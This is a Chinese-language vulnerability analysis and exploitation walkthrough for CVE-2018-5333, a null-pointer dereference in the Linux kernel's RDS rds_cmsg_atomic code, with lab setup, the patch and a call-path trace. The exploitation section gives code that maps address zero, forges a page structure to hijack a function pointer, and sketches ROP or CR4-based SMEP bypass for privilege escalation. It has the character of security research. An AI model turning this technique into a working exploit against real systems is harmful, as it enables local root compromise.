影响版本:Linux 4.14.14以前。 5.5分。4.14.13未修补,4.14.14已修补。
测试版本:Linux-4.14.13 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory
编译选项:CONFIG_RDS=y CONFIG_DEBUG_INFO=y CONFIG_SLAB=y
General setup
—> Choose SLAB allocator (SLUB (Unqueued Allocator))
—> SLAB
在编译时将.config
中的CONFIG_E1000
和CONFIG_E1000E
,变更为=y。参考
可以利用 CVE-2019-9213漏洞 将 MMAP_MIN_ADDR
设置为0,也可以直接在编译时配置内核CONFIG_DEFAULT_MMAP_MIN_ADDR=0
。
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.14.13.tar.xz
$ tar -xvf linux-4.14.13.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。
漏洞描述:net/rds/rdma.c
中的 rds_cmsg_atomic()
函数中忘记将rm->atomic.op_active
置0,导致 rds_atomic_free_op() -> set_page_dirty() 引用page->page_link
时发生 null-dereference
漏洞。
补丁:patch
diff --git a/net/rds/rdma.c b/net/rds/rdma.c
index 94729d9da4372..634cfcb7bba68 100644
--- a/net/rds/rdma.c
+++ b/net/rds/rdma.c
@@ -877,6 +877,7 @@ int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
err:
if (page)
put_page(page);
+ rm->atomic.op_active = 0;
kfree(rm->atomic.op_notifier);
return ret;
保护机制:开启SMEP,关闭KASLR/SMAP。
利用总结:利用空指针引用漏洞,在0地址伪造结构和函数指针,劫持控制流。
一、漏洞分析
RDS介绍:具体可查看Documentation/networking/rds.txt
,
漏洞触发流程:SyS_sendmsg
-> __sys_sendmsg
-> ___sys_sendmsg
-> sock_sendmsg
-> selinux_socket_sendmsg
sendmsg() -> rds_sendmsg() -> rds_cmsg_send() -> rds_cmsg_atomic()
崩溃流程:rds_sendmsg() (从rds_cmsg_send()
返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty()
socket类型设置为pf_rds
,即可通过sendmsg
调用来触发rds_cmsg_send() 。
sendmsg
调用参数:
sendmsg(int socket, const struct msghdr *message, int flags);
// msghdr 结构
struct msghdr {
void *msg_name; /* ptr to socket address structure */
int msg_namelen; /* size of socket address structure */
struct iov_iter msg_iter; /* data */
void *msg_control; /* ancillary data */ // 可用来针对特定协议来传递数据,指向结构结构 struct cmsghdr,其长度为 msg_controllen
__kernel_size_t msg_controllen; /* ancillary data buffer length */
unsigned int msg_flags; /* flags on received message */
struct kiocb *msg_iocb; /* ptr to iocb for async requests */
};
// cmsghdr 结构,其包含一个隐式字段 unsigned char cmsg_data[] 用来保存传递的数据,供特定的协议使用。
struct cmsghdr {
__kernel_size_t cmsg_len; /* data byte count, including hdr */
int cmsg_level; /* originating protocol */
int cmsg_type; /* protocol-specific type */
};
调用流程分析:
int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
{
... ...
ret = rds_cmsg_send(rs, rm, msg, &allocated_mr); // <--------------
if (ret) {
/* Trigger connection so that its ready for the next retry */
if (ret == -EAGAIN)
rds_conn_connect_if_down(conn);
goto out;
}
... ...
out:
/* If the user included a RDMA_MAP cmsg, we allocated a MR on the fly.
* If the sendmsg goes through, we keep the MR. If it fails with EAGAIN
* or in any other way, we need to destroy the MR again */
if (allocated_mr)
rds_rdma_unuse(rs, rds_rdma_cookie_key(rm->m_rdma_cookie), 1);
if (rm)
rds_message_put(rm); // <---------------
return ret;
}
// (1) rds_cmsg_send()
static int rds_cmsg_send(struct rds_sock *rs, struct rds_message *rm,
struct msghdr *msg, int *allocated_mr)
{
struct cmsghdr *cmsg;
int ret = 0;
for_each_cmsghdr(cmsg, msg) {
... ...
case RDS_CMSG_ATOMIC_CSWP:
case RDS_CMSG_ATOMIC_FADD:
case RDS_CMSG_MASKED_ATOMIC_CSWP:
case RDS_CMSG_MASKED_ATOMIC_FADD:
ret = rds_cmsg_atomic(rs, rm, cmsg); // <----------------
break;
... ...
}
// (2) rds_cmsg_atomic —— 设置atomic类型请求的rds_message结构
int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
struct cmsghdr *cmsg)
{
struct page *page = NULL;
struct rds_atomic_args *args;
int ret = 0;
if (cmsg->cmsg_len < CMSG_LEN(sizeof(struct rds_atomic_args))
|| rm->atomic.op_active)
return -EINVAL;
args = CMSG_DATA(cmsg); // #define CMSG_DATA(cmsg) ((void *)((char *)(cmsg) + sizeof(struct cmsghdr))) args指向cmsg中的 cmsg_data, 也即用户内存
... ...
rm->atomic.op_notify = !!(args->flags & RDS_RDMA_NOTIFY_ME);
rm->atomic.op_silent = !!(args->flags & RDS_RDMA_SILENT);
rm->atomic.op_active = 1; // [1] 表示已初始化,可用状态
rm->atomic.op_recverr = rs->rs_recverr;
rm->atomic.op_sg = rds_message_alloc_sgs(rm, 1); // [2] 获取rds_message后面的scatterlist,显然这些scatterlists都是初始化状态,并未分配真正的page
if (!rm->atomic.op_sg) {
ret = -ENOMEM;
goto err;
}
/* verify 8 byte-aligned */
if (args->local_addr & 0x7) { // [3] 地址对齐
ret = -EFAULT;
goto err;
}
ret = rds_pin_pages(args->local_addr, 1, &page, 1); // [4] 获取用户page,再把scatterlist设置为这个page。
if (ret != 1)
goto err;
ret = 0;
sg_set_page(rm->atomic.op_sg, page, 8, offset_in_page(args->local_addr));
if (rm->atomic.op_notify || rm->atomic.op_recverr) {
/* We allocate an uninitialized notifier here, because
* we don't want to do that in the completion handler. We
* would have to use GFP_ATOMIC there, and don't want to deal
* with failed allocations.
*/
rm->atomic.op_notifier = kmalloc(sizeof(*rm->atomic.op_notifier), GFP_KERNEL);
if (!rm->atomic.op_notifier) {
ret = -ENOMEM;
goto err;
}
rm->atomic.op_notifier->n_user_token = args->user_token;
rm->atomic.op_notifier->n_status = RDS_RDMA_SUCCESS;
}
rm->atomic.op_rkey = rds_rdma_cookie_key(args->cookie);
rm->atomic.op_remote_addr = args->remote_addr + rds_rdma_cookie_offset(args->cookie);
return ret;
err:
if (page)
put_page(page);
kfree(rm->atomic.op_notifier); // [5] 出错以后释放掉了rm->atomic.op_notifier,整个rds_sendmsg也宣告结束,之后会释放掉rds_message这个结构。
return ret;
}
// (3) rds_message_put()
void rds_message_put(struct rds_message *rm)
{
rdsdebug("put rm %p ref %d\n", rm, refcount_read(&rm->m_refcount));
WARN(!refcount_read(&rm->m_refcount), "danger refcount zero on %p\n", rm);
if (refcount_dec_and_test(&rm->m_refcount)) {
BUG_ON(!list_empty(&rm->m_sock_item));
BUG_ON(!list_empty(&rm->m_conn_item));
rds_message_purge(rm); // <---------------
kfree(rm);
}
}
EXPORT_SYMBOL_GPL(rds_message_put);
// (4) rds_message_purge() —— 如果进入先前两个错误处理任意其中一个,返回的时候,并没有指定 rm->atomic.op_active=0,所以这里会进入rds_atomic_free_op
static void rds_message_purge(struct rds_message *rm)
{
unsigned long i, flags;
bool zcopy = false;
...
if (rm->rdma.op_active)
rds_rdma_free_op(&rm->rdma);
if (rm->rdma.op_rdma_mr)
rds_mr_put(rm->rdma.op_rdma_mr);
if (rm->atomic.op_active)
rds_atomic_free_op(&rm->atomic); // <---------------
if (rm->atomic.op_rdma_mr)
rds_mr_put(rm->atomic.op_rdma_mr);
}
// (5) rds_atomic_free_op()
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
struct page *page = sg_page(ao->op_sg); // <----------------
/* Mark page dirty if it was possibly modified, which
* is the case for a RDMA_READ which copies from remote
* to local memory */
set_page_dirty(page);
put_page(page);
kfree(ao->op_notifier);
ao->op_notifier = NULL;
ao->op_active = 0;
}
// (6) sg_page() —— 漏洞触发点,出错前没有设置对应 scatterlist 的 page。scatterlist结构page_link的0bit 和 1bit位置上是标志sg_chain和sg_end的flag,所以这里是4对齐。显然初始化状态下的page_link等于0.所以后面在操作page结构的时候,就产生了null pointer dereference。所以这里修复也很简单,只需要在上面错误返回的时候,设置一下rm->atomic.op_active=0, 就可以避免执行 rds_atomic_free_op() 函数。
static inline struct page *sg_page(struct scatterlist *sg)
{
return (struct page *)((sg)->page_link & ~(SG_CHAIN | SG_END));
}
(2) -> [2] scatterlist
结构的创建:
// rds_message_alloc() —— 分配 rds_message 结构时设置 scatterlist 物理内存的散列表,主要是供DMA使用
struct rds_message *rds_message_alloc(unsigned int extra_len, gfp_t gfp)
{
struct rds_message *rm;
if (extra_len > KMALLOC_MAX_SIZE - sizeof(struct rds_message))
return NULL;
rm = kzalloc(sizeof(struct rds_message) + extra_len, gfp); // extra_len就是scatterlists的大小
if (!rm)
goto out;
rm->m_used_sgs = 0;
rm->m_total_sgs = extra_len / sizeof(struct scatterlist);
...
out:
return rm;
}
// rds_rm_size() —— 这里可以看到 extra_len 是怎么计算的
static int rds_rm_size(struct msghdr *msg, int num_sgs,
struct rds_iov_vector_arr *vct)
{
...
switch (cmsg->cmsg_type) {
case RDS_CMSG_ATOMIC_CSWP:
case RDS_CMSG_ATOMIC_FADD:
case RDS_CMSG_MASKED_ATOMIC_CSWP:
case RDS_CMSG_MASKED_ATOMIC_FADD:
cmsg_groups |= 1;
size += sizeof(struct scatterlist);
break;
...
size += num_sgs * sizeof(struct scatterlist);
二、漏洞利用
思路:伪造page结构,劫持page结构上的函数指针。
函数指针引用流程:rds_sendmsg() (从rds_cmsg_send()
返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty() page_mapping()
// (4) rds_atomic_free_op()
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
struct page *page = sg_page(ao->op_sg);
/* Mark page dirty if it was possibly modified, which
* is the case for a RDMA_READ which copies from remote
* to local memory */
set_page_dirty(page);
put_page(page);
kfree(ao->op_notifier);
ao->op_notifier = NULL;
ao->op_active = 0;
}
// (5) set_page_dirty()
int set_page_dirty(struct page *page)
{
struct address_space *mapping = page_mapping(page); // <--------------
page = compound_head(page);
if (likely(mapping)) {
int (*spd)(struct page *) = mapping->a_ops->set_page_dirty; // 发生函数引用,只要mapping来自page,即可劫持控制流。 利用技巧:可充分利用0地址,将 a_ops 设置为0,mapping 不能设置为0,详细情况如下。
... ...
return (*spd)(page);
}
if (!PageDirty(page)) {
if (!TestSetPageDirty(page))
return 1;
}
return 0;
}
EXPORT_SYMBOL(set_page_dirty);
// (6) page_mapping() —— mapping 如何从page中取出
struct address_space *page_mapping(struct page *page)
{
struct address_space *mapping;
page = compound_head(page); // [1] 可以通过page->compound_head改变page的指向,可能有用。
/* This happens if someone calls flush_dcache_page on slab page */
if (unlikely(PageSlab(page)))
return NULL;
if (unlikely(PageSwapCache(page))) { // [2] 避免进入此逻辑,这是通过比较 page->flagsbit 位来判断,所以这里只需要把 page->flags 置零就行。
swp_entry_t entry;
entry.val = page_private(page);
return swap_address_space(entry);
}
mapping = page->mapping;
if ((unsigned long)mapping & PAGE_MAPPING_ANON) // [3] 通过对齐后返回mapping
return NULL;
return (void *)((unsigned long)mapping & ~PAGE_MAPPING_FLAGS);
}
EXPORT_SYMBOL(page_mapping);
// compound_head()
static inline struct page *compound_head(struct page *page)
{
unsigned long head = READ_ONCE(page->compound_head);
if (unlikely(head & 1))
return (struct page *) (head - 1);
return page;
}
伪造page结构:将(5)
中的int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
。可充分利用0地址,将 a_ops
设置为0,mapping
不能设置为0。当 page
和a_ops
都设置为0时,需要解决一个冲突。
page->mapping == ((char *)page)+0x18
a_pos->set_page_dirty == ((char *)a_pos)+0x18
// 所以这里最好是通过compound_head(head),改变一下page,把paga指到其他用户空间上,例如栈上
char str[1000];
map_null_address();
unsigned long *data = (unsigned long *)0;
memset(str,0,1000);
*((unsigned long *)(str+0x18)) = str;
data[1] = str+1;
data[3] = 0xffffffffdeadbeaf;
trigger_null_pointer_ref();
// 报错,说明成功了
[ 2515.888056] BUG: unable to handle kernel paging request at ffffffffdeadbeaf
利用:利用xchg
切换到用户态,执行ROP;也可以写CR4绕过SMEP。
参考
https://nvd.nist.gov/vuln/detail/CVE-2018-5333
CVE-2019-9213 && CVE-2018-5333组合提权
泄露地址 CVE-2017-16994 —— patch blog exp